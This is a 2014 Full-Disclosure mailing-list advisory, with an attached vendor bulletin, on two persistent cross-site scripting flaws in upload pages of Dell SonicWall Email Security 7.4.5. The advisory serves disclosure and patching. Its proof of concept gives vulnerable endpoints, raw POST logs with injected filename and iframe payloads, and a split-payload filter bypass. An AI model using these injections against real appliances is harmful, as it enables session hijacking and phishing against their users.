[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Dell SonicWall EMail Security 7.4.5 - Multiple Vulnerabilities (Bulletin)
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-03-28 12:56:34
Message-ID: 53357182.8040705 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Dell SonicWall EMail Security 7.4.5 - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1191
Dell (SonicWall) Security Bulletin: \
http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
Release Date:
=============
2014-03-26
Vulnerability Laboratory ID (VL-ID):
====================================
1191
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
While most businesses now have some type of anti-spam protection, many must deal with \
cumbersome management, frustrated users, inflexible solutions, and a higher-than-expected \
total cost of ownership. SonicWALL ® Email Security can help. Elegantly simple to deploy, \
manage and use, award-winning SonicWALL Email Security solutions employ a variety of proven \
and patented technology designed to block spam and other threats effectively, easily and \
economically. With innovative protection techniques for both inbound and outbound email plus \
unique management tools, the Email Security platform delivers superior email protection \
today—while standing ready to stop the new attacks of tomorrow.
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a \
software application on a third party Windows ® server, or as a SonicWALL Email Security \
Virtual Appliance in a VMW ® environment. The SonicWALL Email Security Virtual Appliance \
provides the same powerful protection as a traditional SonicWALL Email Security appliance, \
only in a virtual form, to optimize utilization, ease migration and reduce capital costs.
(Copy of the Vendor Homepage: \
http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation \
vulnerabilities in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application.
Vulnerability Disclosure Timeline:
==================================
2014-02-07: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-02-08: Vendor Notification (Dell Security Team)
2014-02-14: Vendor Response/Feedback (Dell Security Team)
2014-03-25: Vendor Fix/Patch (SonicWall Developer Team)
2014-03-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL SonicWall
Product: EMail Security Appliance Application 7.4.5.1393
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official \
Dell SonicWall EMail Security Appliance v7.4.6 Web-Application. The vulnerability allows remote \
attackers or low privileged user accounts to inject own malicious script codes via POST method \
request to compromise the application or user session data/information.
The first vulnerability is located in the `filename` value of the `settings_advanced.html` \
file. Remote attackers and low privileged application user accounts are able to inject own \
malicious script codes to the application-side of the `Advanced Settings - Patch hochladen > \
Patch-Datei` module. Attackers can manipulate the file upload POST method request by tampering \
the session. Next to tampering the session the attacker exchange the file name with a malicious \
script code as payload. In the next step the website reloads the next firmware upgrade page \
(wait.html) with the file details. The execute of the injected script code via POST method \
request occurs at the location of the listed file name value. The security risk of the \
persistent validation web vulnerability is estimated as medium with a cvss (common \
vulnerability scoring system) count of 3.5(-).
The second vulnerability is located in the file name value of the settings_upload_dlicense.html \
file. Remote attackers and low privileged application user accounts are able to inject own \
malicious script codes to the application-side of the Lizenz Verwaltung - Lizenzen Upload \
module. The request method is POST and the attack vector is persistent. The execute occurs in \
the exception context of the license update page module. The security risk of the persistent \
validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring \
system) count of 3.0(+).
Exploitation of both vulnerabilities requires to bypass the regular validation of the web \
application appliance. To bypass the filter remote attackers can inject two payloads with a \
split in the middle. The validation encodes the first injected payload and the second after the \
split executes the code.
Exploitation of the remote web vulnerabilities requires a privileged user account without user \
interaction or a remote user with medium to high user interaction. Successful exploitation of \
the persistent web vulnerabilities results in session hijacking, persistent external redirects, \
persistent phishing and persistent manipulation of vulnerable connected or affected modules.
Request Method:
[+] POST
Vulnerable Module:
[+] Advanced Settings - Patch hochladen > Patch-Datei (settings_advanced.html)
[+] Lizenz Verwaltung - Lizenzen Upload > (settings_upload_dlicense.html)
Vulnerable Parameter(s):
[+] file name
Affected Module(s):
[+] Firmware Update - Waiting Page (wait.html)
[+] License Update Page (exception)
Affected Version(s):
[+] 7.4.6
Affected Appliance Model(s):
[+] Dell SonicWall EMail Security Appliance Web Application - All Models
Proof of Concept (PoC):
=======================
The two persistent input validation web vulnerabilities can be exploited by remote attackers \
with low privileged email security application user account and low user interaction or \
without privileged web-application user account on client-side via POST inject. For security \
demonstration or to reproduce the vulnerability follow the provided information and steps \
below.
URL: Input
http://ess.localhost:8619/settings_advanced.html
URL: Execute
http://ess.localhost:8619/wait.html
PoC: Firmware Update - Status Waiting Site
<div style="border-radius: 10px;" class="warning_bubble_content">
<div class="bubble_title">Die Firmware wird aktualisiert...</div>
<div class="bubble_text">
<div id="updaterMessage">
Installationsdateien werden vorbereitet. Starten Sie keine Dienste neu!
<div class="alert">Email Security ist immer noch mit der Verarbeitung \
von E-Mails beschäftigt.</div> </div>
<div>Aktuelle Produktversion von Email Security 7.4.5.1393.</div>
<div>Upgrade mit >>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg.</div>
<br>
<div><div class="dotdot lefthand"></div></div>
<div>Abgelaufene Zeit: <span id="updateMS">00:00:36</span></div>
<div id="installProgressText" class="tail_trail"></div>
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 302[Moved Temporarily]
POST http://ess.localhost:8619/settings_advanced.html Load Flags[LOAD_DOCUMENT_URI \
LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[text/html] Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_advanced.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------213272019431414
Content-Disposition: form-data; name="sortFiles"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="smtpBanner"
> <><iframe src=http://www.vulnerability-lab.com/> ;)
-----------------------------213272019431414
Content-Disposition: form-data; name="receivedBy"
-----------------------------213272019431414
Content-Disposition: form-data; name="dnsTimeout"
2
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryAgeDays"
10
-----------------------------213272019431414
Content-Disposition: form-data; name="whiteListSelf"
true
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryInbound"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryOutbound"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="logLevel"
fatal
-----------------------------213272019431414
Content-Disposition: form-data; name="dbAging"
366
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpOn"
true
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpComStr"
snwl>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg
-----------------------------213272019431414
Content-Disposition: form-data; name="uploadPatch"; filename=>>"%20<[PERSISTENT INJECTED SCRIPT \
CODE!]>.jpg"
Content-Type: image/jpeg
1.2
URL: Input
http://ess.localhost:8619/settings_dlicense.html
URL: Execute
http://ess.localhost:8619/settings_upload_dlicense.html
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://ess.localhost:8619/settings_upload_dlicense.html Load Flags[LOAD_DOCUMENT_URI \
LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_upload_dlicense.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D;
JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC; __utma=227649090.1810522928.
1391719457.1391719457.1391719457.1; __utmb=227649090.2.10.1391719457; __utmc=227649090; \
__utmz=227649090.1391719457.1. \
1.utmcsr=esserver.demo.sonicwall.com|utmccn=(referral)|utmcmd=referral|utmcct=/settings_branding.html; \
__utmv=227649090.| 1=User%3AUnkown=Unknown=1; \
s_vi=[CS]v1|2979FA11051D0AC5-40000137600ADB77[CE]] Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------281841889227097
Content-Disposition: form-data; name="uploadLicenses"; filename=">>"%20<[PERSISTENT INJECTED \
SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg
Solution - Fix & Patch:
=======================
Both vulnerabilities can be patched by a secure parse and encode of the file name value in the \
2 affected upload POST method requests. Filter and encode also in the wait.html and license \
exception the vulnerable output values even if the input is still parsed.
SonicWall Solution:
============
We recommend existing users of Dell SonicWALL Email Security upgrade to version 7.4.6 to \
prevent this cross-site script injection from being executed by unauthorized users. Email \
Security 7.4.6 is available for download from www.mysonicwall.com. Users should log into \
mySonicWALL and click on Downloads > Download Center in the navigation panel in the left-hand \
navigation, then select "Email Security" in the Software Type drop down menu.
Security Risk:
==============
The security risk of the persistent and non persistent post inject web vulnerabilities are \
estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
-------------------
Document Title:
===============
ES746 Support-Bulletin - EMS Vulnerability Resolved
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1241
Download: http://www.vulnerability-lab.com/resources/bulletins/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
Original: http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
Advisory: http://www.vulnerability-lab.com/get_content.php?id=1191
Release Date:
=============
2014-03-26
Vulnerability Laboratory ID (VL-ID):
====================================
1241
Common Vulnerability Scoring System:
====================================
3.5
Vulnerability Disclosure Timeline:
==================================
2014-03-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Bulletins
Severity Level:
===============
Medium
Technical Details & Description:
================================
A cross-site scripting vulnerability was reported in the ‘License Management' and \
‘Advanced' pages of Dell SonicWALL Email Security version 7.4.5 that could enable a logged in \
user to inject malicious code.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic